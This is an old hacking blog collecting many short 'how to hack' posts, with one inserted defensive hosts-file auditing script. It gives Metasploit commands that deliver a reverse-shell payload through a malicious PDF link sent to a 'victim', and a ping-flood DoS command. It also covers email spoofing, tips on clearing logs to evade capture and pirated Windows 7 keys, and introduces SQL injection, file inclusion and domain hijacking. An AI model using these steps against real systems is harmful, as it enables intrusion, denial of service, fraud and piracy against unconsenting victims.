We are dealing with the best educated generation in the world, but they have got a brain dressed up with nowhere to go

Saturday, September 29, 2012

How to Hack Windows 7 using Metasploit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.
Requirement
metasploit
Windows 7
Open terminal type

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Exploit Targets
0 – Automatic (default)
1 – Internet Explorer 8
2 – Internet Explorer 7
3 – Internet Explorer 6
4 – Debug Target (Crash)
Requirement
Attacker: metasploit
Victim PC: Windows 7
Open terminal type

Hack Remote XP using Heap Overflow Attack

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than what is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for the IE 8 target, you may choose either the JRE ROP or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Hack Windows XP using Shell Link Code Execution

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
Exploit Targets
Windows XP service pack 2
Windows XP service pack 3
Requirement
Attacker: metasploit
Victim PC: Windows XP
Open terminal type

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets
0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)
1 – Adobe Reader v8.1.2 (Windows XP SP2 English)
Requirement
Attacker: metasploit
Victim PC: Windows XP
Open terminal type

msfconsole
use exploit/windows/browser/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set lhost 192.168.1.4 (IP of Local Host)
msf exploit(adobe_jbig2decode) > set srvhost 192.168.1.4 (This must be an address on the local machine)
msf exploit(adobe_jbig2decode) > set uripath akonsong (The URL to use for this exploit)
msf exploit(adobe_jbig2decode) > exploit

Now the URL you should give to your victim is http://192.168.1.4:8080/akonsong

When the victim opens that link in their browser, it will immediately show a dialog box about the akonsong PDF.



Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number to connect to. Then type “sessions -i ID”

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits a vulnerability in the Smart Independent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.
Exploit Targets
0 – Automatic (default)
Requirement
Victim PC: Windows XP
Open backtrack terminal type
msfconsole
use exploit/windows/browser/adobe_cooltype_sing

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument Injection
This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.
Exploit Targets
0 – Automatic (default)
1 – Java Runtime on Windows x86
Requirement
Attacker: metasploit
Victim PC: Windows XP

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement
Attacker: metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/fileformat/adobe_flatedecode_predictor02
msf exploit(adobe_flatedecode_predictor02) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flatedecode_predictor02) > show options

Redirect Site to Another Site

A simple text file edit makes one site redirect to another. When you type an address in the address bar of any browser and press Enter, a different web page is displayed. For example, when you type Google.com you will be redirected to yahoo.com.

Instructions:

1) Go to this directory [c:\windows\system32\drivers\etc]; the directory may change according to the drive used for the OS installation
2) Then hit Enter
3) Find a file named "hosts"
4) Right-click on it and open it with WordPad.
5) In the last line of the document, type the IP* address of yahoo, a space, then www.Google.com (vice versa for other sites)
6) Now save it
7) Restart the browser if it's already running
8) Now try it. It works perfectly

IP*: to find the IP address of that website, go to Start -> Run > type cmd > Enter. Now you have a new window on the desktop. In it, type this without quotes: "ping www.yahoo.com"
Replace yahoo.com with your preferred site and then press Enter.
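
A defender's check for the change these steps make, as an added example that is not part of the original post: the Python below parses hosts-file text and reports every name pinned to an address outside of DNS, marking names on a watch list as high severity. The function names, the watch list and the sample file contents are assumptions constructed for illustration.

```python
import ipaddress

# Hostnames that legitimately appear in a default hosts file.
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
                 "ip6-loopback", "broadcasthost"}


def parse_hosts(text):
    """Yield (lineno, ip, hostname) for every usable mapping in hosts-file text."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop full-line and inline comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                          # an address with no name maps nothing
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                          # malformed address: not a usable mapping
        for name in fields[1:]:               # one line may carry several aliases
            yield lineno, ip, name.lower().rstrip(".")


def audit_hosts(text, watchlist=()):
    """Return findings for mappings that override normal DNS resolution.

    severity "high":   the name is on (or under) a watched domain and points
                       at a routable address, i.e. a redirect.
    severity "review": any other non-default name pinned to an address
                       (including 0.0.0.0 / loopback sinkhole entries).
    """
    watched = {d.lower().rstrip(".") for d in watchlist}
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if name in DEFAULT_NAMES:
            continue
        on_watchlist = any(name == d or name.endswith("." + d) for d in watched)
        sinkhole = ip.is_loopback or ip.is_unspecified
        severity = "high" if on_watchlist and not sinkhole else "review"
        findings.append({"line": lineno, "ip": str(ip), "name": name,
                         "severity": severity})
    return findings


# Constructed sample: default entries plus the kind of line step 5 adds.
# 203.0.113.10 is a documentation address (TEST-NET-3), not a real site.
SAMPLE = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.10    www.Google.com   # added by hand
0.0.0.0         ads.example.net
not-an-ip       www.example.org
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE, watchlist=["google.com"]):
        print(finding)
```

On a real machine the text would be read from the hosts file in the directory named in step 1, and the watch list would hold the domains whose resolution matters to you.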

How to Do Remote File Inclusion?

Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server-side commands as the current logged-on user and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.

Friday, September 28, 2012

DOS ATTACK ON WEBSITE.

DOWNLOAD TOOL FROM HERE.
ALTHOUGH IT SHOWS THAT THE FILE IS VIRUS INFECTED, IT'S NOT.
PLACE THE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE & PRESS ENTER.

OR YOU CAN ALSO DO IT MANUALLY. JUST OPEN CMD & TYPE THE COMMAND. BUT IT'S AN OLD METHOD, SO I RECOMMEND YOU USE THE TOOL.

ping (Ip Address) -t -l 65000

IF YOU WANT TO KNOW MORE ABOUT IT, PLEASE READ THE FOLLOWING DOCUMENT.
IT HAS EXPLAINED EVERYTHING. CLICK HERE.

Wednesday, September 26, 2012

How to Find i.p Address of Remote computer?

This article is about getting the IP address of a remote computer, i.e., in terms of hacking, getting the IP address of the victim computer.
Before proceeding, let's learn something about IP addresses.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.
An IP address serves two basic purposes:
1. Host or network interface identification
2. Location Addressing

Tuesday, September 25, 2012

Using nmap to change a source address

Using nmap to change a source address. The commands used are:
nmap -iflist
...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:
nmap -e eth0 -S 192.168.1.100 192.168.1.109
...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.



How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, DHCP server, and DNS servers.


1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".


2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:
Windows IP Configuration:

Monday, September 24, 2012

how to install metasploit in ubuntu?

(1) First, download the latest Metasploit version for Linux from here.

(2) Next, move the downloaded file into your home folder. The .run file must be made executable, so run the following commands in your terminal.

(3) sudo chmod +x metasploit-latest-linux-installer.run

(4) sudo ./metasploit-latest-linux-installer.run
After that the uncompress process will start and it will install automatically.
Follow some basic steps and get the activation code.
Open a terminal and run the following command:

(5) msfconsole
It will show:
msf>


Friday, September 21, 2012

List of Useful Hacking Tools

Here I am listing some good free hacking software which is very useful to hack any system. Download from HERE.
(1) NESSUS - Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.

What is TELNET ? & How to Use TELNET?

Telnet: the Number One Hacker Tool

In this Guide you will learn:
· What is telnet?
· How to telnet
· How to get telnet accounts
· Why you might not want to telnet
· How to install a telnet server on your home Windows computer
· How to turn off a telnet server on your home Linux computer
· How to explore computers using telnet
· Why not use a portscanner instead?
· How to break into web sites using telnet
"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.

Domain Hijacking – How to Hijack a Domain

Domain hijacking is a process by which Internet domain names are stolen from their legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how domain names operate and how they get associated with a particular web server (website).

The operation of a domain name is as follows:
Any website, say for example gohacking.com, consists of two parts: the domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of the domain name with the web hosting server is done as follows.

How to Spoof an Email Addresses?

If you want to send email from your friend's email address, you can use the following services. Keep in mind that the email is not actually sent from your friend's mail address, but the person who receives the email sees your friend's email address as the sender.

www.hoaxmail.co.uk

anonymailer.net

emkei.cz
Of all the above, emkei.cz is my favourite because it provides some advanced options like email header, reply-to, cc etc.

You can also send from your cmd, but for that purpose you need the S.M.T.P server name of your I.S.P., so use the above services only for fun.

Friday, September 14, 2012

BSNL search & Reliance Mobile search

If you want to inquire about any BSNL residential number, the link is below:
http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam

And if you want to know the details of any Reliance number, the link is below. But unfortunately it now provides only the surname or first name.

http://myservices.relianceada.com/captureInstantRecharge.do

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

Nmap is a powerful scanner available on Unix/Linux systems. It’s very useful for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.
It’s very easy to install nmap in Ubuntu, just download it from the internet.
taufanlubis@zyrex:~$ sudo apt-get install nmap

How to install Nmap 6.01 in Ubuntu from source?

1. Make sure you have bzip2 and g++ installed. If not, you can install them using the command
      sudo apt-get install bzip2 g++

2. Download Nmap 6.01 to any location of your choice. In this example we are going to assume that it
    is downloaded to ~/Downloads.

Sunday, September 9, 2012

Online Hash Crackers

Cracker              Hashes
Tobtu                50,529,455,839
TMTO                 36,436,233,567
MD5Decrypter(uk)     8,700,000,000
OnlineHashCrack      5,211,644,250
AuthSecu             500,000,000

Saturday, September 8, 2012

how to clear log & become anonymous?

Guys, this is not my tutorial, but I would like to share it because it's very important for all of us!!
Okay, let's begin!

1) How hackers get caught.

- The first thing that gives you away is "LOGS".
You need to know how event, application, and system logs work. If you don't, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binaries.

google hack trick

Ok, today I will show a Google hack demonstration you've never seen before.
You will never find these fucking Google hack codes on the internet.
Just watch and learn what I have discovered!!!

Ok, it's time to show the secrets.

And these are the best Google hack codes.

Saturday, September 1, 2012

Speed of your bandwidth (internet speed)

Windows uses 20% of your bandwidth. Here's how to get it back

A nice little tweak for XP. Microsoft reserves 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc.)

Here's how to get it back:

Click Start-->Run-->type "gpedit.msc" without the "

Top 20 terminal command of ubuntu

1. Kill a running application by its name

killall [app_name]

2. Display disk space usage:

df -h

3. Locate the installation directories of a program:

whereis [app]

How to change login screen of ubuntu 10.10?

Here is a way to change the looks of your login screen, it allows you to change the background, fonts and GTK theme using the Appearance Manager.



First open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo cp /usr/share/applications/gnome-appearance-properties.desktop /usr/share/gdm/autostart/LoginWindow

Now close the Terminal window and log out. When logged out, the Appearance window pops up. Here you can make the changes you want, and when you're done you can log in as usual. To prevent the Appearance Manager from opening when you log in, open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo unlink /usr/share/gdm/autostart/LoginWindow/gnome-appearance-properties.desktop

USE NOKIA MOBILE AS MODEM IN UBUNTU

1) Connect the phone with USB and select PC Suite Mode on the phone (even though you are not using PC Suite, as that is Windows only).
2) Open Network Manager on Ubuntu; it should show an entry for mobile broadband.
3) Select the mobile broadband entry and use the wizard to select details for the network (I used AIRTEL).
4) You should now be able to select the entry and connect to the internet from Network Manager.

Windows-7 genuine key

22TKD-F8XX6-YG69F-9M66D-PMJBM
TWMF7-M387V-XKW4Y-PVQQD-RK7C8
HTJK6-DXX8T-TVCR6-KDG67-97J8Q
D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV

1. Insert the Windows 7 disc.
2. Then open the disc and open the source folder, and then open product.ini, or search for product.ini on the disc.
3. You can now use the keys seen in the notepad.

FIRESHEEP TUTORIAL(HTTP SESSION HIJACKING)

Firesheep, a Firefox addon, has recently become very popular for easily carrying out an HTTP session hijacking attack. An HTTP session hijacking attack can't be considered a very sophisticated attack, but it needs some technical knowledge to be performed. Firesheep, however, makes the attack child's play. Firesheep was developed by Eric Butler for Firefox; it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.

Hacking website using SQL Injection -step by step guide

Before we see what SQL Injection is, we should know what SQL and a database are.

Database:
A database is a collection of data. From a website's point of view, a database is used for storing user IDs, passwords, web page details and more.

Some databases are:

* DB servers,
* MySQL (open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* PostgreSQL (open source),
* SQLite,

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a software program and run the trial program forever. Most of us are familiar with many programs that run only for a specified period of time in trial mode. Once the trial period has expired, these programs stop functioning and demand a purchase. But there is a way to run the programs and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in trial mode forever, we have to understand how these programs function. I’ll try to explain this in brief.